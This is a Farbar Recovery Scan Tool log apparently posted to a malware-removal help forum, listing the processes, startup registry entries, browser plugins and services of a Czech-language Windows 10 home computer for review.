Drive d: (Data) (Fixed) (Total:736.2 GB) (Free:46.62 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or (Size: 931.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== End of Addition.txt ============================
Re: Please check my log
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-03-2017
Ran by Nekut (administrator) on DESKTOP-S3S217H (16-03-2017 16:46:58)
Running from C:\Users\Nekut\Desktop
Loaded Profiles: Nekut (Available Profiles: Nekut)
Platform: Windows 10 Home Version 1607 (X64) Language: Czech (Czech Republic)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(O&O Software GmbH) C:\Program Files\OO Software\Defrag\oodag.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.1051_none_7f2bf7ea21d201b2\TiWorker.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\CisTray.exe
(Bitsum LLC) C:\Program Files\Process Lasso\ProcessLasso.exe
(Bitsum LLC) C:\Program Files\Process Lasso\ProcessGovernor.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cis.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(O&O Software GmbH) C:\Program Files\OO Software\Defrag\oodtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Autodesk, Inc.) C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Autodesk, Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk Inc.) C:\Windows\Temp\AdAppMgrUpdater.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-08-21] (Realtek Semiconductor)
HKLM\...\Run: [OODefragTray] => C:\Program Files\OO Software\Defrag\oodtray.exe [4465448 2014-08-29] (O&O Software GmbH)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [MRT] => C:\WINDOWS\system32\MRT.exe [138634176 2017-03-14] (Microsoft Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1519800 2016-12-28] (COMODO)
HKLM\...\Run: [ZAM] => C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14471408 2017-03-06] (Copyright 2017.)
HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [721856 2016-07-01] (Autodesk, Inc.)
HKLM-x32\...\Run: [4StoryPrePatch] => C:\Program Files (x86)\GameforgeLive\Games\CZE_ces\4Story\PrePatch.exe
HKLM-x32\...\Run: [GameforgeLive] => "C:\Program Files (x86)\GameforgeLive\gfl_client.exe" -autostart
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [BitTorrent] => C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe [1984200 2017-02-14] (BitTorrent Inc.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2860832 2016-10-13] (Valve Corporation)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9105112 2016-11-15] (Piriform Ltd)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Policies\Explorer: []
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\MountPoints2: {cb3db3c3-4bfd-11e5-9bdf-d8cb8a9936d5} - "F:\setup.exe"
HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2016-02-07] (Autodesk, Inc.)
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\O&O Defrag Tray.lnk [2017-03-01]
ShortcutTarget: O&O Defrag Tray.lnk -> C:\Windows\Installer\{50C961A1-889F-4A4E-9587-2772A45B6AAD}\app_icon.ico ()
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.20 192.168.10.1
Tcpip\..\Interfaces\{6ad7d0b9-d1fb-40da-b893-a182542204a7}: [DhcpNameServer] 192.168.1.20 192.168.10.1
Internet Explorer:
==================
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://ww.google.cz/
SearchScopes: HKU\S-1-5-21-2417313614-488722605-2671369154-1001 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll [2015-11-25] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll [2015-11-25] (Oracle Corporation)
FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll [2015-11-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\plugin2\npjp2.dll [2015-11-25] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-22] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-22] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default [2017-03-16]
CHR Extension: (Prezentace Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-03-15]
CHR Extension: (Dokumenty Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-03-15]
CHR Extension: (Disk Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-03-15]
CHR Extension: (YouTube) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-03-15]
CHR Extension: (Tabulky Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-03-15]
CHR Extension: (Dokumenty Google offline) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-03-16]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-15]
CHR Extension: (Gmail) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-03-15]
CHR Extension: (Chrome Media Router) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-03-15]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 gpsvc; C:\WINDOWS\System32\gpsvc.dll [1227264 2017-03-04] (Microsoft Corporation) [File not signed]
R2 nsi; C:\WINDOWS\System32\nsisvc.dll [30720 2016-07-16] (Microsoft Corporation) [File not signed]
U2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1295376 2016-07-01] (Autodesk Inc.)
U3 AJRouter; C:\WINDOWS\System32\AJRouter.dll [24576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ALG; C:\WINDOWS\System32\alg.exe [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AppIDSvc; C:\WINDOWS\System32\appidsvc.dll [124416 2016-07-16] (Microsoft Corporation) [File not signed]
R3 Appinfo; C:\WINDOWS\System32\appinfo.dll [125952 2017-03-04] (Microsoft Corporation) [File not signed]
U3 AppReadiness; C:\WINDOWS\system32\AppReadiness.dll [560128 2017-03-04] (Microsoft Corporation) [File not signed]
U3 AppXSvc; C:\WINDOWS\system32\appxdeploymentserver.dll [2278400 2017-03-04] (Microsoft Corporation) [File not signed]
U2 AudioEndpointBuilder; C:\WINDOWS\System32\AudioEndpointBuilder.dll [337920 2016-11-02] (Microsoft Corporation) [File not signed]
R2 Audiosrv; C:\WINDOWS\System32\Audiosrv.dll [942080 2016-11-02] (Microsoft Corporation) [File not signed]
U3 AxInstSV; C:\WINDOWS\System32\AxInstSV.dll [113664 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BDESVC; C:\WINDOWS\System32\bdesvc.dll [361472 2016-09-15] (Microsoft Corporation) [File not signed]
U2 BFE; C:\WINDOWS\System32\bfe.dll [795648 2016-07-16] (Microsoft Corporation) [File not signed]
U2 BITS; C:\WINDOWS\System32\qmgr.dll [1054208 2016-10-15] (Microsoft Corporation) [File not signed]
U2 BrokerInfrastructure; C:\WINDOWS\System32\bisrv.dll [770560 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Browser; C:\WINDOWS\System32\browser.dll [134656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BthHFSrv; C:\WINDOWS\System32\BthHFSrv.dll [321536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bthserv; C:\WINDOWS\system32\bthserv.dll [157184 2016-07-16] (Microsoft Corporation) [File not signed]
U2 CDPSvc; C:\WINDOWS\System32\CDPSvc.dll [411648 2016-11-11] (Microsoft Corporation) [File not signed]
U2 CDPUserSvc; C:\WINDOWS\System32\CDPUserSvc.dll [339456 2016-11-11] (Microsoft Corporation) [File not signed]
U3 CertPropSvc; C:\WINDOWS\System32\certprop.dll [193536 2017-03-04] (Microsoft Corporation) [File not signed]
U2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [6758568 2016-12-28] (COMODO)
U3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2876088 2016-12-28] (COMODO)
U2 CoreMessagingRegistrar; C:\WINDOWS\SysWOW64\coremessaging.dll [483840 2017-03-04] (Microsoft Corporation) [File not signed]
R2 CryptSvc; C:\WINDOWS\system32\cryptsvc.dll [81920 2016-07-16] (Microsoft Corporation) [File not signed]
R2 DcomLaunch; C:\WINDOWS\system32\rpcss.dll [888320 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DcpSvc; C:\WINDOWS\system32\dcpsvc.dll [183808 2016-07-16] (Microsoft Corporation) [File not signed]
U3 defragsvc; C:\WINDOWS\System32\defragsvc.dll [511488 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DeviceAssociationService; C:\WINDOWS\system32\das.dll [447488 2016-09-27] (Microsoft Corporation) [File not signed]
U3 DeviceInstall; C:\WINDOWS\system32\umpnpmgr.dll [111104 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DevQueryBroker; C:\WINDOWS\system32\DevQueryBroker.dll [34304 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dhcp; C:\WINDOWS\system32\dhcpcore.dll [360960 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dhcp; C:\WINDOWS\SysWOW64\dhcpcore.dll [292864 2016-07-16] (Microsoft Corporation) [File not signed]
U3 diagnosticshub.standardcollector.service; C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [93184 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DiagTrack; C:\WINDOWS\system32\diagtrack.dll [1981440 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
U3 DmEnrollmentSvc; C:\WINDOWS\system32\Windows.Internal.Management.dll [407552 2017-03-04] (Microsoft Corporation) [File not signed]
U3 DmEnrollmentSvc; C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll [298496 2017-03-04] (Microsoft Corporation) [File not signed]
U3 dmwappushservice; C:\WINDOWS\system32\dmwappushsvc.dll [57344 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dnscache; C:\WINDOWS\System32\dnsrslvr.dll [264704 2017-03-04] (Microsoft Corporation) [File not signed]
U2 DoSvc; C:\WINDOWS\system32\dosvc.dll [1231872 2016-12-14] (Microsoft Corporation) [File not signed]
U3 dot3svc; C:\WINDOWS\System32\dot3svc.dll [262144 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DPS; C:\WINDOWS\system32\dps.dll [172032 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DsmSvc; C:\WINDOWS\System32\DeviceSetupManager.dll [197632 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DsSvc; C:\WINDOWS\System32\DsSvc.dll [152576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EapHost; C:\WINDOWS\System32\eapsvc.dll [112128 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EFS; C:\WINDOWS\system32\efssvc.dll [55296 2016-07-16] (Microsoft Corporation) [File not signed]
U3 embeddedmode; C:\WINDOWS\System32\embeddedmodesvc.dll [140800 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EntAppSvc; C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll [285696 2016-11-11] (Microsoft Corporation) [File not signed]
U2 EventLog; C:\WINDOWS\System32\wevtsvc.dll [1709056 2016-09-15] (Microsoft Corporation) [File not signed]
U2 EventSystem; C:\WINDOWS\system32\es.dll [453632 2016-07-16] (Microsoft Corporation) [File not signed]
U2 EventSystem; C:\WINDOWS\SysWOW64\es.dll [347136 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Fax; C:\WINDOWS\system32\fxssvc.exe [644608 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fdPHost; C:\WINDOWS\system32\fdPHost.dll [20992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 FDResPub; C:\WINDOWS\system32\fdrespub.dll [35328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fhsvc; C:\WINDOWS\system32\fhsvc.dll [122368 2016-07-16] (Microsoft Corporation) [File not signed]
U2 FontCache; C:\WINDOWS\system32\FntCache.dll [1840640 2017-03-04] (Microsoft Corporation) [File not signed]
U3 FrameServer; C:\WINDOWS\system32\FrameServer.dll [805888 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [520416 2014-01-28] (Futuremark)
U3 hidserv; C:\WINDOWS\system32\hidserv.dll [36864 2016-07-16] (Microsoft Corporation) [File not signed]
U3 hidserv; C:\WINDOWS\SysWOW64\hidserv.dll [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HomeGroupListener; C:\WINDOWS\system32\ListSvc.dll [274432 2016-11-02] (Microsoft Corporation) [File not signed]
U3 HomeGroupProvider; C:\WINDOWS\system32\provsvc.dll [447488 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HomeGroupProvider; C:\WINDOWS\SysWOW64\provsvc.dll [385536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HvHost; C:\WINDOWS\System32\hvhostsvc.dll [67584 2016-07-16] (Microsoft Corporation) [File not signed]
U3 icssvc; C:\WINDOWS\System32\tetheringservice.dll [202240 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IKEEXT; C:\WINDOWS\System32\ikeext.dll [932352 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
U4 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [File not signed]
U2 iphlpsvc; C:\WINDOWS\System32\iphlpsvc.dll [945664 2017-03-04] (Microsoft Corporation) [File not signed]
U3 irmon; C:\WINDOWS\System32\irmon.dll [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [File not signed]
U2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [223008 2015-06-24] (Intel Corporation)
U3 KeyIso; C:\WINDOWS\system32\keyiso.dll [96768 2016-07-16] (Microsoft Corporation) [File not signed]
U3 KeyIso; C:\WINDOWS\SysWOW64\keyiso.dll [70656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 KtmRm; C:\WINDOWS\system32\msdtckrm.dll [376320 2016-07-16] (Microsoft Corporation) [File not signed]
U2 LanmanServer; C:\WINDOWS\system32\srvsvc.dll [305152 2016-07-16] (Microsoft Corporation) [File not signed]
R2 LanmanWorkstation; C:\WINDOWS\System32\wkssvc.dll [283648 2016-11-11] (Microsoft Corporation) [File not signed]
U3 lfsvc; C:\WINDOWS\System32\lfsvc.dll [37376 2016-07-16] (Microsoft Corporation) [File not signed]
U3 LicenseManager; C:\WINDOWS\system32\LicenseManagerSvc.dll [26112 2016-09-27] (Microsoft Corporation) [File not signed]
U3 lltdsvc; C:\WINDOWS\System32\lltdsvc.dll [275456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 lmhosts; C:\WINDOWS\System32\lmhsvc.dll [27136 2016-07-16] (Microsoft Corporation) [File not signed]
U2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
U2 LSM; C:\WINDOWS\System32\lsm.dll [691712 2016-11-11] (Microsoft Corporation) [File not signed]
U2 MapsBroker; C:\WINDOWS\System32\moshost.dll [82944 2017-03-04] (Microsoft Corporation) [File not signed]
U2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
U3 MessagingService; C:\WINDOWS\System32\MessagingService.dll [52224 2016-07-16] (Microsoft Corporation) [File not signed]
U2 MpsSvc; C:\WINDOWS\system32\mpssvc.dll [893952 2017-03-04] (Microsoft Corporation) [File not signed]
U3 MSDTC; C:\WINDOWS\System32\msdtc.exe [147456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSiSCSI; C:\WINDOWS\system32\iscsiexe.dll [151552 2016-07-16] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\WINDOWS\System32\msiexec.exe [65024 2016-07-16] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\WINDOWS\SysWOW64\msiexec.exe [58368 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcaSvc; C:\WINDOWS\System32\ncasvc.dll [167936 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcbService; C:\WINDOWS\System32\ncbservice.dll [339968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcdAutoSetup; C:\WINDOWS\System32\NcdAutoSetup.dll [88576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netlogon; C:\WINDOWS\system32\netlogon.dll [827392 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netlogon; C:\WINDOWS\SysWOW64\netlogon.dll [670720 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netman; C:\WINDOWS\System32\netman.dll [259072 2016-07-16] (Microsoft Corporation) [File not signed]
U3 netprofm; C:\WINDOWS\System32\netprofmsvc.dll [519168 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NetSetupSvc; C:\WINDOWS\System32\NetSetupSvc.dll [265728 2016-11-02] (Microsoft Corporation) [File not signed]
U3 NgcCtnrSvc; C:\WINDOWS\System32\NgcCtnrSvc.dll [330752 2017-03-04] (Microsoft Corporation) [File not signed]
U3 NgcSvc; C:\WINDOWS\system32\ngcsvc.dll [983040 2016-10-05] (Microsoft Corporation) [File not signed]
U2 NlaSvc; C:\WINDOWS\System32\nlasvc.dll [368640 2016-10-05] (Microsoft Corporation) [File not signed]
U3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [6053312 2016-08-22] (INCA Internet Co., Ltd.)
U2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
U3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
U2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
U2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-02-23] (NVIDIA Corporation)
U2 OneSyncSvc; C:\WINDOWS\System32\APHostService.dll [366592 2016-07-16] (Microsoft Corporation) [File not signed]
U2 OODefragAgent; C:\Program Files\OO Software\Defrag\oodag.exe [1660200 2014-08-29] (O&O Software GmbH)
U4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2015-12-02] (Electronic Arts)
U3 p2pimsvc; C:\WINDOWS\system32\pnrpsvc.dll [345088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 p2psvc; C:\WINDOWS\system32\p2psvc.dll [425472 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PerfHost; C:\WINDOWS\SysWow64\perfhost.exe [21504 2016-07-16] (Microsoft Corporation) [File not signed]
